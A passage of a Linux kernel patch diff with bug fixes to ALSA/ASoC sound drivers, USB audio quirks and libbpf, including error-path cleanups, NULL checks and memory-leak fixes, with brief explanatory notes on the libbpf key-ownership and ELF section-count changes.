+@@ -1116,7 +1116,10 @@ static void skl_shutdown(struct pci_dev *pci)
+ 	if (!skl->init_done)
+ 		return;
+ 
+-	snd_hdac_stop_streams_and_chip(bus);
++	snd_hdac_stop_streams(bus);
++	snd_hdac_ext_bus_link_power_down_all(bus);
++	skl_dsp_sleep(skl->dsp);
++
+ 	list_for_each_entry(s, &bus->stream_list, list) {
+ 		stream = stream_to_hdac_ext_stream(s);
+ 		snd_hdac_ext_stream_decouple(bus, stream, false);
+diff --git a/sound/soc/mediatek/common/mtk-btcvsd.c b/sound/soc/mediatek/common/mtk-btcvsd.c
+index d884bb7c0fc74..1c28b41e43112 100644
+--- a/sound/soc/mediatek/common/mtk-btcvsd.c
++++ b/sound/soc/mediatek/common/mtk-btcvsd.c
+@@ -1038,11 +1038,9 @@ static int mtk_pcm_btcvsd_copy(struct snd_soc_component *component,
+ 	struct mtk_btcvsd_snd *bt = snd_soc_component_get_drvdata(component);
+ 
+ 	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
+-		mtk_btcvsd_snd_write(bt, buf, count);
++		return mtk_btcvsd_snd_write(bt, buf, count);
+ 	else
+-		mtk_btcvsd_snd_read(bt, buf, count);
+-
+-	return 0;
++		return mtk_btcvsd_snd_read(bt, buf, count);
+ }
+ 
+ /* kcontrol */
+diff --git a/sound/soc/mediatek/mt8173/mt8173-afe-pcm.c b/sound/soc/mediatek/mt8173/mt8173-afe-pcm.c
+index dcaeeeb8aac70..bc155dd937e0b 100644
+--- a/sound/soc/mediatek/mt8173/mt8173-afe-pcm.c
++++ b/sound/soc/mediatek/mt8173/mt8173-afe-pcm.c
+@@ -1070,16 +1070,6 @@ static int mt8173_afe_pcm_dev_probe(struct platform_device *pdev)
+ 
+ 	afe->dev = &pdev->dev;
+ 
+-	irq_id = platform_get_irq(pdev, 0);
+-	if (irq_id <= 0)
+-		return irq_id < 0 ? irq_id : -ENXIO;
+-	ret = devm_request_irq(afe->dev, irq_id, mt8173_afe_irq_handler,
+-			       0, "Afe_ISR_Handle", (void *)afe);
+-	if (ret) {
+-		dev_err(afe->dev, "could not request_irq\n");
+-		return ret;
+-	}
+-
+ 	afe->base_addr = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(afe->base_addr))
+ 		return PTR_ERR(afe->base_addr);
+@@ -1185,6 +1175,16 @@ static int mt8173_afe_pcm_dev_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_cleanup_components;
+ 
++	irq_id = platform_get_irq(pdev, 0);
++	if (irq_id <= 0)
++		return irq_id < 0 ? irq_id : -ENXIO;
++	ret = devm_request_irq(afe->dev, irq_id, mt8173_afe_irq_handler,
++			       0, "Afe_ISR_Handle", (void *)afe);
++	if (ret) {
++		dev_err(afe->dev, "could not request_irq\n");
++		goto err_pm_disable;
++	}
++
+ 	dev_info(&pdev->dev, "MT8173 AFE driver initialized.\n");
+ 	return 0;
+ 
+diff --git a/sound/soc/mediatek/mt8173/mt8173-rt5650-rt5514.c b/sound/soc/mediatek/mt8173/mt8173-rt5650-rt5514.c
+index 12f40c81b101e..f803f121659de 100644
+--- a/sound/soc/mediatek/mt8173/mt8173-rt5650-rt5514.c
++++ b/sound/soc/mediatek/mt8173/mt8173-rt5650-rt5514.c
+@@ -200,14 +200,16 @@ static int mt8173_rt5650_rt5514_dev_probe(struct platform_device *pdev)
+ 	if (!mt8173_rt5650_rt5514_dais[DAI_LINK_CODEC_I2S].codecs[0].of_node) {
+ 		dev_err(&pdev->dev,
+ 			"Property 'audio-codec' missing or invalid\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto out;
+ 	}
+ 	mt8173_rt5650_rt5514_dais[DAI_LINK_CODEC_I2S].codecs[1].of_node =
+ 		of_parse_phandle(pdev->dev.of_node, "mediatek,audio-codec", 1);
+ 	if (!mt8173_rt5650_rt5514_dais[DAI_LINK_CODEC_I2S].codecs[1].of_node) {
+ 		dev_err(&pdev->dev,
+ 			"Property 'audio-codec' missing or invalid\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto out;
+ 	}
+ 	mt8173_rt5650_rt5514_codec_conf[0].dlc.of_node =
+ 		mt8173_rt5650_rt5514_dais[DAI_LINK_CODEC_I2S].codecs[1].of_node;
+@@ -216,6 +218,7 @@ static int mt8173_rt5650_rt5514_dev_probe(struct platform_device *pdev)
+ 
+ 	ret = devm_snd_soc_register_card(&pdev->dev, card);
+ 
++out:
+ 	of_node_put(platform_node);
+ 	return ret;
+ }
+diff --git a/sound/soc/mediatek/mt8183/mt8183-mt6358-ts3a227-max98357.c b/sound/soc/mediatek/mt8183/mt8183-mt6358-ts3a227-max98357.c
+index a860852236779..48c14be5e3db7 100644
+--- a/sound/soc/mediatek/mt8183/mt8183-mt6358-ts3a227-max98357.c
++++ b/sound/soc/mediatek/mt8183/mt8183-mt6358-ts3a227-max98357.c
+@@ -677,8 +677,10 @@ mt8183_mt6358_ts3a227_max98357_dev_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	card = (struct snd_soc_card *)of_device_get_match_data(&pdev->dev);
+-	if (!card)
++	if (!card) {
++		of_node_put(platform_node);
+ 		return -EINVAL;
++	}
+ 	card->dev = &pdev->dev;
+ 
+ 	ec_codec = of_parse_phandle(pdev->dev.of_node, "mediatek,ec-codec", 0);
+@@ -767,8 +769,10 @@ mt8183_mt6358_ts3a227_max98357_dev_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	priv = devm_kzalloc(&pdev->dev, sizeof(*priv), GFP_KERNEL);
+-	if (!priv)
+-		return -ENOMEM;
++	if (!priv) {
++		ret = -ENOMEM;
++		goto out;
++	}
+ 
+ 	snd_soc_card_set_drvdata(card, priv);
+ 
+@@ -776,7 +780,8 @@ mt8183_mt6358_ts3a227_max98357_dev_probe(struct platform_device *pdev)
+ 	if (IS_ERR(priv->pinctrl)) {
+ 		dev_err(&pdev->dev, "%s devm_pinctrl_get failed\n",
+ 			__func__);
+-		return PTR_ERR(priv->pinctrl);
++		ret = PTR_ERR(priv->pinctrl);
++		goto out;
+ 	}
+ 
+ 	for (i = 0; i < PIN_STATE_MAX; i++) {
+@@ -809,6 +814,7 @@ mt8183_mt6358_ts3a227_max98357_dev_probe(struct platform_device *pdev)
+ 
+ 	ret = devm_snd_soc_register_card(&pdev->dev, card);
+ 
++out:
+ 	of_node_put(platform_node);
+ 	of_node_put(ec_codec);
+ 	of_node_put(hdmi_codec);
+diff --git a/sound/soc/mediatek/mt8186/mt8186-mt6366-da7219-max98357.c b/sound/soc/mediatek/mt8186/mt8186-mt6366-da7219-max98357.c
+index cfca6bdee8345..90ec0d0a83927 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-mt6366-da7219-max98357.c
++++ b/sound/soc/mediatek/mt8186/mt8186-mt6366-da7219-max98357.c
+@@ -192,7 +192,7 @@ static int mt8186_mt6366_da7219_max98357_hdmi_init(struct snd_soc_pcm_runtime *r
+ 	struct mt8186_mt6366_da7219_max98357_priv *priv = soc_card_data->mach_priv;
+ 	int ret;
+ 
+-	ret = mt8186_dai_i2s_set_share(afe, "I2S3", "I2S2");
++	ret = mt8186_dai_i2s_set_share(afe, "I2S2", "I2S3");
+ 	if (ret) {
+ 		dev_err(rtd->dev, "Failed to set up shared clocks\n");
+ 		return ret;
+diff --git a/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c b/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
+index 2414c5b77233c..60fa55d0c91f0 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
++++ b/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
+@@ -168,7 +168,7 @@ static int mt8186_mt6366_rt1019_rt5682s_hdmi_init(struct snd_soc_pcm_runtime *rt
+ 	struct mt8186_mt6366_rt1019_rt5682s_priv *priv = soc_card_data->mach_priv;
+ 	int ret;
+ 
+-	ret = mt8186_dai_i2s_set_share(afe, "I2S3", "I2S2");
++	ret = mt8186_dai_i2s_set_share(afe, "I2S2", "I2S3");
+ 	if (ret) {
+ 		dev_err(rtd->dev, "Failed to set up shared clocks\n");
+ 		return ret;
+diff --git a/sound/soc/pxa/mmp-pcm.c b/sound/soc/pxa/mmp-pcm.c
+index 5d520e18e512f..99b245e3079a2 100644
+--- a/sound/soc/pxa/mmp-pcm.c
++++ b/sound/soc/pxa/mmp-pcm.c
+@@ -98,7 +98,7 @@ static bool filter(struct dma_chan *chan, void *param)
+ 
+ 	devname = kasprintf(GFP_KERNEL, "%s.%d", dma_data->dma_res->name,
+ 		dma_data->ssp_id);
+-	if ((strcmp(dev_name(chan->device->dev), devname) == 0) &&
++	if (devname && (strcmp(dev_name(chan->device->dev), devname) == 0) &&
+ 		(chan->chan_id == dma_data->dma_res->start)) {
+ 		found = true;
+ 	}
+diff --git a/sound/soc/qcom/Kconfig b/sound/soc/qcom/Kconfig
+index 8c7398bc1ca89..96a6d4731e6fd 100644
+--- a/sound/soc/qcom/Kconfig
++++ b/sound/soc/qcom/Kconfig
+@@ -2,6 +2,7 @@
+ menuconfig SND_SOC_QCOM
+ 	tristate "ASoC support for QCOM platforms"
+ 	depends on ARCH_QCOM || COMPILE_TEST
++	imply SND_SOC_QCOM_COMMON
+ 	help
+ 	  Say Y or M if you want to add support to use audio devices
+ 	  in Qualcomm Technologies SOC-based platforms.
+@@ -59,13 +60,14 @@ config SND_SOC_STORM
+ config SND_SOC_APQ8016_SBC
+ 	tristate "SoC Audio support for APQ8016 SBC platforms"
+ 	select SND_SOC_LPASS_APQ8016
+-	select SND_SOC_QCOM_COMMON
++	depends on SND_SOC_QCOM_COMMON
+ 	help
+ 	  Support for Qualcomm Technologies LPASS audio block in
+ 	  APQ8016 SOC-based systems.
+ 	  Say Y if you want to use audio devices on MI2S.
+ 
+ config SND_SOC_QCOM_COMMON
++	depends on SOUNDWIRE
+ 	tristate
+ 
+ config SND_SOC_QDSP6_COMMON
+@@ -142,7 +144,7 @@ config SND_SOC_MSM8996
+ 	depends on QCOM_APR
+ 	depends on COMMON_CLK
+ 	select SND_SOC_QDSP6
+-	select SND_SOC_QCOM_COMMON
++	depends on SND_SOC_QCOM_COMMON
+ 	help
+ 	  Support for Qualcomm Technologies LPASS audio block in
+ 	  APQ8096 SoC-based systems.
+@@ -153,7 +155,7 @@ config SND_SOC_SDM845
+ 	depends on QCOM_APR && I2C && SOUNDWIRE
+ 	depends on COMMON_CLK
+ 	select SND_SOC_QDSP6
+-	select SND_SOC_QCOM_COMMON
++	depends on SND_SOC_QCOM_COMMON
+ 	select SND_SOC_RT5663
+ 	select SND_SOC_MAX98927
+ 	imply SND_SOC_CROS_EC_CODEC
+@@ -167,7 +169,7 @@ config SND_SOC_SM8250
+ 	depends on QCOM_APR && SOUNDWIRE
+ 	depends on COMMON_CLK
+ 	select SND_SOC_QDSP6
+-	select SND_SOC_QCOM_COMMON
++	depends on SND_SOC_QCOM_COMMON
+ 	help
+ 	  To add support for audio on Qualcomm Technologies Inc.
+ 	  SM8250 SoC-based systems.
+@@ -178,7 +180,7 @@ config SND_SOC_SC8280XP
+ 	depends on QCOM_APR && SOUNDWIRE
+ 	depends on COMMON_CLK
+ 	select SND_SOC_QDSP6
+-	select SND_SOC_QCOM_COMMON
++	depends on SND_SOC_QCOM_COMMON
+ 	help
+ 	  To add support for audio on Qualcomm Technologies Inc.
+ 	  SC8280XP SoC-based systems.
+@@ -188,7 +190,7 @@ config SND_SOC_SC7180
+ 	tristate "SoC Machine driver for SC7180 boards"
+ 	depends on I2C && GPIOLIB
+ 	depends on SOUNDWIRE || SOUNDWIRE=n
+-	select SND_SOC_QCOM_COMMON
++	depends on SND_SOC_QCOM_COMMON
+ 	select SND_SOC_LPASS_SC7180
+ 	select SND_SOC_MAX98357A
+ 	select SND_SOC_RT5682_I2C
+@@ -202,7 +204,7 @@ config SND_SOC_SC7180
+ config SND_SOC_SC7280
+ 	tristate "SoC Machine driver for SC7280 boards"
+ 	depends on I2C && SOUNDWIRE
+-	select SND_SOC_QCOM_COMMON
++	depends on SND_SOC_QCOM_COMMON
+ 	select SND_SOC_LPASS_SC7280
+ 	select SND_SOC_MAX98357A
+ 	select SND_SOC_WCD938X_SDW
+diff --git a/sound/soc/qcom/common.c b/sound/soc/qcom/common.c
+index 69dd3b504e209..49c74c1662a3f 100644
+--- a/sound/soc/qcom/common.c
++++ b/sound/soc/qcom/common.c
+@@ -180,7 +180,6 @@ err_put_np:
+ }
+ EXPORT_SYMBOL_GPL(qcom_snd_parse_of);
+ 
+-#if IS_ENABLED(CONFIG_SOUNDWIRE)
+ int qcom_snd_sdw_prepare(struct snd_pcm_substream *substream,
+ 			 struct sdw_stream_runtime *sruntime,
+ 			 bool *stream_prepared)
+@@ -294,7 +293,6 @@ int qcom_snd_sdw_hw_free(struct snd_pcm_substream *substream,
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(qcom_snd_sdw_hw_free);
+-#endif
+ 
+ int qcom_snd_wcd_jack_setup(struct snd_soc_pcm_runtime *rtd,
+ 			    struct snd_soc_jack *jack, bool *jack_setup)
+diff --git a/sound/soc/qcom/common.h b/sound/soc/qcom/common.h
+index c5472a642de08..3ef5bb6d12df7 100644
+--- a/sound/soc/qcom/common.h
++++ b/sound/soc/qcom/common.h
+@@ -11,7 +11,6 @@ int qcom_snd_parse_of(struct snd_soc_card *card);
+ int qcom_snd_wcd_jack_setup(struct snd_soc_pcm_runtime *rtd,
+ 			    struct snd_soc_jack *jack, bool *jack_setup);
+ 
+-#if IS_ENABLED(CONFIG_SOUNDWIRE)
+ int qcom_snd_sdw_prepare(struct snd_pcm_substream *substream,
+ 			 struct sdw_stream_runtime *runtime,
+ 			 bool *stream_prepared);
+@@ -21,26 +20,4 @@ int qcom_snd_sdw_hw_params(struct snd_pcm_substream *substream,
+ int qcom_snd_sdw_hw_free(struct snd_pcm_substream *substream,
+ 			 struct sdw_stream_runtime *sruntime,
+ 			 bool *stream_prepared);
+-#else
+-static inline int qcom_snd_sdw_prepare(struct snd_pcm_substream *substream,
+-				       struct sdw_stream_runtime *runtime,
+-				       bool *stream_prepared)
+-{
+-	return -ENOTSUPP;
+-}
+-
+-static inline int qcom_snd_sdw_hw_params(struct snd_pcm_substream *substream,
+-					 struct snd_pcm_hw_params *params,
+-					 struct sdw_stream_runtime **psruntime)
+-{
+-	return -ENOTSUPP;
+-}
+-
+-static inline int qcom_snd_sdw_hw_free(struct snd_pcm_substream *substream,
+-				       struct sdw_stream_runtime *sruntime,
+-				       bool *stream_prepared)
+-{
+-	return -ENOTSUPP;
+-}
+-#endif
+ #endif
+diff --git a/sound/soc/qcom/lpass-sc7180.c b/sound/soc/qcom/lpass-sc7180.c
+index 77a556b27cf09..24a1c121cb2e9 100644
+--- a/sound/soc/qcom/lpass-sc7180.c
++++ b/sound/soc/qcom/lpass-sc7180.c
+@@ -131,6 +131,9 @@ static int sc7180_lpass_init(struct platform_device *pdev)
+ 
+ 	drvdata->clks = devm_kcalloc(dev, variant->num_clks,
+ 				     sizeof(*drvdata->clks), GFP_KERNEL);
++	if (!drvdata->clks)
++		return -ENOMEM;
++
+ 	drvdata->num_clks = variant->num_clks;
+ 
+ 	for (i = 0; i < drvdata->num_clks; i++)
+diff --git a/sound/soc/rockchip/rockchip_pdm.c b/sound/soc/rockchip/rockchip_pdm.c
+index a7549f8272359..5b1e47bdc376b 100644
+--- a/sound/soc/rockchip/rockchip_pdm.c
++++ b/sound/soc/rockchip/rockchip_pdm.c
+@@ -431,6 +431,7 @@ static int rockchip_pdm_runtime_resume(struct device *dev)
+ 
+ 	ret = clk_prepare_enable(pdm->hclk);
+ 	if (ret) {
++		clk_disable_unprepare(pdm->clk);
+ 		dev_err(pdm->dev, "hclock enable failed %d\n", ret);
+ 		return ret;
+ 	}
+diff --git a/sound/soc/rockchip/rockchip_spdif.c b/sound/soc/rockchip/rockchip_spdif.c
+index 8bef572d3cbc1..5b4f004575879 100644
+--- a/sound/soc/rockchip/rockchip_spdif.c
++++ b/sound/soc/rockchip/rockchip_spdif.c
+@@ -88,6 +88,7 @@ static int __maybe_unused rk_spdif_runtime_resume(struct device *dev)
+ 
+ 	ret = clk_prepare_enable(spdif->hclk);
+ 	if (ret) {
++		clk_disable_unprepare(spdif->mclk);
+ 		dev_err(spdif->dev, "hclk clock enable failed %d\n", ret);
+ 		return ret;
+ 	}
+diff --git a/sound/usb/endpoint.c b/sound/usb/endpoint.c
+index 310cd6fb0038a..4aaf0784940b5 100644
+--- a/sound/usb/endpoint.c
++++ b/sound/usb/endpoint.c
+@@ -1673,6 +1673,13 @@ void snd_usb_endpoint_stop(struct snd_usb_endpoint *ep, bool keep_pending)
+ 		stop_urbs(ep, false, keep_pending);
+ 		if (ep->clock_ref)
+ 			atomic_dec(&ep->clock_ref->locked);
++
++		if (ep->chip->quirk_flags & QUIRK_FLAG_FORCE_IFACE_RESET &&
++		    usb_pipeout(ep->pipe)) {
++			ep->need_prepare = true;
++			if (ep->iface_ref)
++				ep->iface_ref->need_setup = true;
++		}
+ 	}
+ }
+ 
+diff --git a/sound/usb/pcm.c b/sound/usb/pcm.c
+index 8ed165f036a01..9557bd4d1bbca 100644
+--- a/sound/usb/pcm.c
++++ b/sound/usb/pcm.c
+@@ -604,6 +604,7 @@ static int snd_usb_pcm_prepare(struct snd_pcm_substream *substream)
+ 	struct snd_pcm_runtime *runtime = substream->runtime;
+ 	struct snd_usb_substream *subs = runtime->private_data;
+ 	struct snd_usb_audio *chip = subs->stream->chip;
++	int retry = 0;
+ 	int ret;
+ 
+ 	ret = snd_usb_lock_shutdown(chip);
+@@ -614,6 +615,7 @@ static int snd_usb_pcm_prepare(struct snd_pcm_substream *substream)
+ 		goto unlock;
+ 	}
+ 
++ again:
+ 	if (subs->sync_endpoint) {
+ 		ret = snd_usb_endpoint_prepare(chip, subs->sync_endpoint);
+ 		if (ret < 0)
+@@ -638,9 +640,16 @@ static int snd_usb_pcm_prepare(struct snd_pcm_substream *substream)
+ 
+ 	subs->lowlatency_playback = lowlatency_playback_available(runtime, subs);
+ 	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK &&
+-	    !subs->lowlatency_playback)
++	    !subs->lowlatency_playback) {
+ 		ret = start_endpoints(subs);
+-
++		/* if an XRUN happens while starting the streams (possibly
++		 * in the implicit feedback case), restart them, but only
++		 * retry once.
++		 */
++		if (ret == -EPIPE && !retry++) {
++			sync_pending_stops(subs);
++			goto again;
++		}
++	}
+  unlock:
+ 	snd_usb_unlock_shutdown(chip);
+ 	return ret;
+diff --git a/sound/usb/quirks-table.h b/sound/usb/quirks-table.h
+index 874fcf245747f..271884e350035 100644
+--- a/sound/usb/quirks-table.h
++++ b/sound/usb/quirks-table.h
+@@ -76,6 +76,8 @@
+ { USB_DEVICE_VENDOR_SPEC(0x041e, 0x3f0a) },
+ /* E-Mu 0204 USB */
+ { USB_DEVICE_VENDOR_SPEC(0x041e, 0x3f19) },
++/* Ktmicro Usb_audio device */
++{ USB_DEVICE_VENDOR_SPEC(0x31b2, 0x0011) },
+ 
+ /*
+  * Creative Technology, Ltd Live! Cam Sync HD [VF0770]
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 0f4dd3503a6a9..58b37bfc885cb 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -2044,6 +2044,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 	DEVICE_FLG(0x0644, 0x804a, /* TEAC UD-301 */
+ 		   QUIRK_FLAG_ITF_USB_DSD_DAC | QUIRK_FLAG_CTL_MSG_DELAY |
+ 		   QUIRK_FLAG_IFACE_DELAY),
++	DEVICE_FLG(0x0644, 0x805f, /* TEAC Model 12 */
++		   QUIRK_FLAG_FORCE_IFACE_RESET),
+ 	DEVICE_FLG(0x06f8, 0xb000, /* Hercules DJ Console (Windows Edition) */
+ 		   QUIRK_FLAG_IGNORE_CTL_ERROR),
+ 	DEVICE_FLG(0x06f8, 0xd002, /* Hercules DJ Console (Macintosh Edition) */
+diff --git a/sound/usb/usbaudio.h b/sound/usb/usbaudio.h
+index e97141ef730ad..2aba508a48312 100644
+--- a/sound/usb/usbaudio.h
++++ b/sound/usb/usbaudio.h
+@@ -172,6 +172,9 @@ extern bool snd_usb_skip_validation;
+  *  Don't apply implicit feedback sync mode
+  * QUIRK_FLAG_IFACE_SKIP_CLOSE
+  *  Don't closed interface during setting sample rate
++ * QUIRK_FLAG_FORCE_IFACE_RESET
++ *  Force an interface reset whenever stopping & restarting a stream
++ *  (e.g. after xrun)
+  */
+ 
+ #define QUIRK_FLAG_GET_SAMPLE_RATE	(1U << 0)
+@@ -194,5 +197,6 @@ extern bool snd_usb_skip_validation;
+ #define QUIRK_FLAG_GENERIC_IMPLICIT_FB	(1U << 17)
+ #define QUIRK_FLAG_SKIP_IMPLICIT_FB	(1U << 18)
+ #define QUIRK_FLAG_IFACE_SKIP_CLOSE	(1U << 19)
++#define QUIRK_FLAG_FORCE_IFACE_RESET	(1U << 20)
+ 
+ #endif /* __USBAUDIO_H */
+diff --git a/tools/bpf/bpftool/common.c b/tools/bpf/bpftool/common.c
+index 0cdb4f7115101..e7a11cff7245a 100644
+--- a/tools/bpf/bpftool/common.c
++++ b/tools/bpf/bpftool/common.c
+@@ -499,6 +499,7 @@ static int do_build_table_cb(const char *fpath, const struct stat *sb,
+ 	if (err) {
+ 		p_err("failed to append entry to hashmap for ID %u, path '%s': %s",
+ 		      pinned_info.id, path, strerror(errno));
++		free(path);
+ 		goto out_close;
+ 	}
+ 
+diff --git a/tools/lib/bpf/bpf.h b/tools/lib/bpf/bpf.h
+index 9c50beabdd145..fddc05c667b5d 100644
+--- a/tools/lib/bpf/bpf.h
++++ b/tools/lib/bpf/bpf.h
+@@ -393,8 +393,15 @@ LIBBPF_API int bpf_task_fd_query(int pid, int fd, __u32 flags, char *buf,
+ 				 __u32 *buf_len, __u32 *prog_id, __u32 *fd_type,
+ 				 __u64 *probe_offset, __u64 *probe_addr);
+ 
++#ifdef __cplusplus
++/* forward-declaring enums in C++ isn't compatible with pure C enums, so
++ * instead define bpf_enable_stats() as accepting int as an input
++ */
++LIBBPF_API int bpf_enable_stats(int type);
++#else
+ enum bpf_stats_type; /* defined in up-to-date linux/bpf.h */
+ LIBBPF_API int bpf_enable_stats(enum bpf_stats_type type);
++#endif
+ 
+ struct bpf_prog_bind_opts {
+ 	size_t sz; /* size of this struct for forward/backward compatibility */
+diff --git a/tools/lib/bpf/btf.c b/tools/lib/bpf/btf.c
+index d88647da2c7fc..675a0df5c840f 100644
+--- a/tools/lib/bpf/btf.c
++++ b/tools/lib/bpf/btf.c
+@@ -3887,14 +3887,14 @@ static inline __u16 btf_fwd_kind(struct btf_type *t)
+ }
+ 
+ /* Check if given two types are identical ARRAY definitions */
+-static int btf_dedup_identical_arrays(struct btf_dedup *d, __u32 id1, __u32 id2)
++static bool btf_dedup_identical_arrays(struct btf_dedup *d, __u32 id1, __u32 id2)
+ {
+ 	struct btf_type *t1, *t2;
+ 
+ 	t1 = btf_type_by_id(d->btf, id1);
+ 	t2 = btf_type_by_id(d->btf, id2);
+ 	if (!btf_is_array(t1) || !btf_is_array(t2))
+-		return 0;
++		return false;
+ 
+ 	return btf_equal_array(t1, t2);
+ }
+@@ -3918,7 +3918,9 @@ static bool btf_dedup_identical_structs(struct btf_dedup *d, __u32 id1, __u32 id
+ 	m1 = btf_members(t1);
+ 	m2 = btf_members(t2);
+ 	for (i = 0, n = btf_vlen(t1); i < n; i++, m1++, m2++) {
+-		if (m1->type != m2->type)
++		if (m1->type != m2->type &&
++		    !btf_dedup_identical_arrays(d, m1->type, m2->type) &&
++		    !btf_dedup_identical_structs(d, m1->type, m2->type))
+ 			return false;
+ 	}
+ 	return true;
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index 3937f66c7f8d6..0b470169729e6 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -219,6 +219,17 @@ static int btf_dump_resize(struct btf_dump *d)
+ 	return 0;
+ }
+ 
++static void btf_dump_free_names(struct hashmap *map)
++{
++	size_t bkt;
++	struct hashmap_entry *cur;
++
++	hashmap__for_each_entry(map, cur, bkt)
++		free((void *)cur->key);
++
++	hashmap__free(map);
++}
++
+ void btf_dump__free(struct btf_dump *d)
+ {
+ 	int i;
+@@ -237,8 +248,8 @@ void btf_dump__free(struct btf_dump *d)
+ 	free(d->cached_names);
+ 	free(d->emit_queue);
+ 	free(d->decl_stack);
+-	hashmap__free(d->type_names);
+-	hashmap__free(d->ident_names);
++	btf_dump_free_names(d->type_names);
++	btf_dump_free_names(d->ident_names);
+ 
+ 	free(d);
+ }
+@@ -1520,11 +1531,23 @@ static void btf_dump_emit_type_cast(struct btf_dump *d, __u32 id,
+ static size_t btf_dump_name_dups(struct btf_dump *d, struct hashmap *name_map,
+ 				 const char *orig_name)
+ {
++	char *old_name, *new_name;
+ 	size_t dup_cnt = 0;
++	int err;
++
++	new_name = strdup(orig_name);
++	if (!new_name)
++		return 1;
+ 
+ 	hashmap__find(name_map, orig_name, (void **)&dup_cnt);
+ 	dup_cnt++;
+-	hashmap__set(name_map, orig_name, (void *)dup_cnt, NULL, NULL);
++
++	err = hashmap__set(name_map, new_name, (void *)dup_cnt,
++			   (const void **)&old_name, NULL);
++	if (err)
++		free(new_name);
++
++	free(old_name);
+ 
+ 	return dup_cnt;
+ }
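
Both btf_dump.c hunks are about key ownership: the name maps previously stored borrowed name pointers whose lifetime was not guaranteed, so keys are now strdup()ed on insert, the displaced old key is freed on replacement, and teardown frees every remaining key before destroying the map. The ownership contract in a generic form (table_get()/table_set() are hypothetical; table_set() hands back any key it displaced):

	#include <stdlib.h>
	#include <string.h>

	struct table;
	size_t table_get(struct table *t, const char *key);
	int table_set(struct table *t, const char *key, size_t val,
		      const char **old_key);

	static size_t bump_dup_cnt(struct table *t, const char *orig_name)
	{
		const char *old_key = NULL;
		char *key = strdup(orig_name);	/* table owns its keys */
		size_t cnt;

		if (!key)
			return 1;

		cnt = table_get(t, orig_name) + 1;
		if (table_set(t, key, cnt, &old_key))
			free(key);		/* insert failed: still ours */
		free((char *)old_key);		/* replaced key was ours */
		return cnt;
	}
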
+diff --git a/tools/lib/bpf/libbpf.c b/tools/lib/bpf/libbpf.c
+index 91b7106a4a735..b9a29d1053765 100644
+--- a/tools/lib/bpf/libbpf.c
++++ b/tools/lib/bpf/libbpf.c
+@@ -597,7 +597,7 @@ struct elf_state {
+ 	size_t shstrndx; /* section index for section name strings */
+ 	size_t strtabidx;
+ 	struct elf_sec_desc *secs;
+-	int sec_cnt;
++	size_t sec_cnt;
+ 	int btf_maps_shndx;
+ 	__u32 btf_maps_sec_btf_id;
+ 	int text_shndx;
+@@ -1408,6 +1408,10 @@ static int bpf_object__check_endianness(struct bpf_object *obj)
+ static int
+ bpf_object__init_license(struct bpf_object *obj, void *data, size_t size)
+ {
++	if (!data) {
++		pr_warn("invalid license section in %s\n", obj->path);
++		return -LIBBPF_ERRNO__FORMAT;
++	}
+ 	/* libbpf_strlcpy() only copies first N - 1 bytes, so size + 1 won't
+ 	 * go over allowed ELF data section buffer
+ 	 */
+@@ -1421,7 +1425,7 @@ bpf_object__init_kversion(struct bpf_object *obj, void *data, size_t size)
+ {
+ 	__u32 kver;
+ 
+-	if (size != sizeof(kver)) {
++	if (!data || size != sizeof(kver)) {
+ 		pr_warn("invalid kver section in %s\n", obj->path);
+ 		return -LIBBPF_ERRNO__FORMAT;
+ 	}
+@@ -3312,10 +3316,15 @@ static int bpf_object__elf_collect(struct bpf_object *obj)
+ 	Elf64_Shdr *sh;
+ 
+ 	/* ELF section indices are 0-based, but sec #0 is special "invalid"
+-	 * section. e_shnum does include sec #0, so e_shnum is the necessary
+-	 * size of an array to keep all the sections.
++	 * section. Since section count retrieved by elf_getshdrnum() does
++	 * include sec #0, it is already the necessary size of an array to keep
++	 * all the sections.
+ 	 */
+-	obj->efile.sec_cnt = obj->efile.ehdr->e_shnum;
++	if (elf_getshdrnum(obj->efile.elf, &obj->efile.sec_cnt)) {
++		pr_warn("elf: failed to get the number of sections for %s: %s\n",
++			obj->path, elf_errmsg(-1));
++		return -LIBBPF_ERRNO__FORMAT;
++	}
+ 	obj->efile.secs = calloc(obj->efile.sec_cnt, sizeof(*obj->efile.secs));
+ 	if (!obj->efile.secs)
+ 		return -ENOMEM;
+@@ -4106,6 +4115,9 @@ static struct bpf_program *find_prog_by_sec_insn(const struct bpf_object *obj,
+ 	int l = 0, r = obj->nr_programs - 1, m;
+ 	struct bpf_program *prog;
+ 
++	if (!obj->nr_programs)
++		return NULL;
++
+ 	while (l < r) {
+ 		m = l + (r - l + 1) / 2;
+ 		prog = &obj->programs[m];
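
The elf_getshdrnum() change covers extended section numbering: e_shnum is a 16-bit header field and reads 0 once an object has SHN_LORESERVE (0xff00) or more sections, the real count then living in section 0's sh_size; elf_getshdrnum() decodes both encodings. Usage, assuming an already-opened Elf handle:

	#include <libelf.h>

	/* returns the section count including the reserved section #0,
	 * handling the extended-numbering case that e_shnum cannot */
	static int section_count(Elf *elf, size_t *cnt)
	{
		if (elf_getshdrnum(elf, cnt))
			return -1;	/* details via elf_errmsg(-1) */
		return 0;
	}
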
+diff --git a/tools/lib/bpf/usdt.c b/tools/lib/bpf/usdt.c
+index e83b497c22454..49f3c3b7f6095 100644
+--- a/tools/lib/bpf/usdt.c
++++ b/tools/lib/bpf/usdt.c
+@@ -1348,25 +1348,23 @@ static int calc_pt_regs_off(const char *reg_name)
+ 
